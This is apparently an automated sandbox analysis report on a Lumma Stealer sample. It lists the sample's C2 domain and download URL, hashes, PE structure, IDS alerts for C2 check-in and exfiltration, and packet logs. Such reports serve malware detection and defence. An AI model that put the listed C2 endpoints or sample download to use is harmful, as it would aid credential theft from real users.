                                                                    https://discokeyus.lat/NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://discokeyus.lat/JNAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://discokeyus.lat:443/apilat/JNAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://discokeyus.lat:443/apioNAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://discokeyus.lat:443/apiNAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.mozilla.org/products/firefoxgro.allNAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.mozilla.orNAliwxUTJ4.exe, 00000001.00000003.2616874817.00000000054F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaNAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.21.99
                                                                                          		discokeyus.latUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1578940
                                                                                          Start date and time:2024-12-20 16:54:14 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 58s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:4
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:NAliwxUTJ4.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:0a678f4e43e83079c1e95517f576a88d.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 9
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.109.210.53, 13.107.246.63
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target NAliwxUTJ4.exe, PID 828 because there are no executed function
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: NAliwxUTJ4.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          10:55:42API Interceptor10x Sleep call for process: NAliwxUTJ4.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          104.21.21.991QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                            gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                              m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                  gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                    f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                      RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                                                                                                        SBLUj2UYnk.exeGet hashmaliciousLummaCBrowse
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              discokeyus.latXNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.197.170
                                                                                                              Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                              • 104.21.21.99
                                                                                                              BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              iv382V1eOK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSXNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.197.170
                                                                                                              Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                              • 104.21.21.99
                                                                                                              http://email.mg.mylearninghub.com/c/eJyUzr9OxCAcAOCngc2Gf6UwMBjPeiZ3i4nJeRuF3vWXUlBKz9anNw5OTu7f8HlDnacU94Y2XEhKJFF4MPqinXaO1KLXyhHbKKuJrLUinXVKKgyGESYoo5oyKkVT-UbwWrva876RjikkyHStpi30NkeI12HpKpcmHMxQyvuM-D1iLWKt70Oxv-ivR6y1SxkQay-Q53JIV4htCiF9HiCOiLcu-f4hxQvkCfHdG23G7vixvj4v9XY80ePTeHoJqzz79XGvzivZf51P4w0Qk-AR30muFM7GbnHJVWfzCBEJ4i2AG-ButnHc0k-jKhmX_83xzbDvAAAA__-qL3HaGet hashmaliciousUnknownBrowse
                                                                                                              • 104.18.42.227
                                                                                                              https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.21.73.56
                                                                                                              BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              iv382V1eOK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.197.170
                                                                                                              gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              http://northwesthousingservices.discussripped.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.21.89.240

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 104.21.21.99
                                                                                                              Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                              • 104.21.21.99
                                                                                                              BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              iv382V1eOK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99
                                                                                                              gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.99

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              No created / dropped files found

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.948090750964882
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:NAliwxUTJ4.exe
                                                                                                              File size:1'861'120 bytes
                                                                                                              MD5:0a678f4e43e83079c1e95517f576a88d
                                                                                                              SHA1:4012a39b2f700273402d3adbc54f0f87eac2fa56
                                                                                                              SHA256:6b17962e6298e3118f5301af6bdceccbf3c79663e4a526e128a5c306a232bc01
                                                                                                              SHA512:c3ee30975f86b80db6f8b0ed9a032924a12486528e0745d02e1e4372de1775ecda86cdd17c28586dcdde1300a95c66579b707944dcdf445b21ccba2f4fc6df63
                                                                                                              SSDEEP:24576:1D3Z+og2dL7dT1TKvDXBujJ535WxkeQaJ4LAQJtbbY9mjrdprIt6vxM2c3WDLKoR:ZJTH/9hWxkeP2Mm7ra6pM2c3+XLl
                                                                                                              TLSH:CB85330E3F17B4E3CE66C537187514832EB004E8C8CAB5AC7A65FFE8946721A5D49C6B
                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I...........@.................................T0..h..

                                                                                                              File Icon

                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x898000
                                                                                                              Entrypoint Section:.taggant
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp 00007FEBD8C46A4Ah
                                                                                                              cmove ebx, dword ptr [eax+eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              jmp 00007FEBD8C48A45h
                                                                                                              add byte ptr [edi], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dl
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ebx], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [edi], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [ebx], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ecx], al
                                                                                                              add byte ptr [eax], 00000000h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              pop es
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              0x10000x510000x248007e94ac9668edf73f2afd5ee88be294b9False0.9973980629280822data7.9808008709140585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              0x540000x2a40000x2006d43d4ce893b2d6ca7548bac0c853865unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              speiiqif0x2f80000x19f0000x19e2003c9d0ef281852de18235a1d8017352a6False0.9946216844627226data7.953421574141461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              suzusvsz0x4970000x10000x400675a6c3c52b6932bc89b74b99a9964b3False0.734375data5.901911512979839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .taggant0x4980000x30000x220093ab6a4f23f8624f0b28993cda073384False0.06100643382352941DOS executable (COM)0.7879226478005152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              kernel32.dlllstrcpy

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-20T16:55:43.732478+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.6584621.1.1.153UDP
                                                                                                              2024-12-20T16:55:43.929541+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.6644951.1.1.153UDP
                                                                                                              2024-12-20T16:55:44.125790+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.6634351.1.1.153UDP
                                                                                                              2024-12-20T16:55:45.988644+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649716104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:45.988644+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:47.721915+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649716104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:47.721915+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649716104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:49.316014+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649718104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:49.316014+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:50.075795+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649718104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:50.075795+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649718104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:51.829517+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649719104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:51.829517+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649719104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:54.160731+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649721104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:54.160731+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649721104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:57.164911+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649723104.21.21.99443TCP
                                                                                                              2024-12-20T16:55:57.164911+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649723104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:00.318496+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649726104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:00.318496+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649726104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:01.110822+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649726104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:02.993587+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649729104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:02.993587+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649729104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:03.034655+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.649729104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:07.187800+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.649730104.21.21.99443TCP
                                                                                                              2024-12-20T16:56:07.187800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649730104.21.21.99443TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 20, 2024 16:55:44.273901939 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:44.273963928 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:44.274107933 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:44.756989002 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:44.757029057 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:45.988559961 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:45.988643885 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:45.990977049 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:45.990999937 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:45.991278887 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:46.031238079 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:46.842274904 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:46.842300892 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:46.842582941 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:47.721921921 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:47.722045898 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:47.722126007 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:47.944060087 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:47.944097996 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:47.944108009 CET49716443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:47.944118023 CET44349716104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:48.098582983 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:48.098618031 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:48.098690987 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:48.098954916 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:48.098974943 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:49.315920115 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:49.316014051 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:49.317322969 CET49718443192.168.2.6104.21.21.99
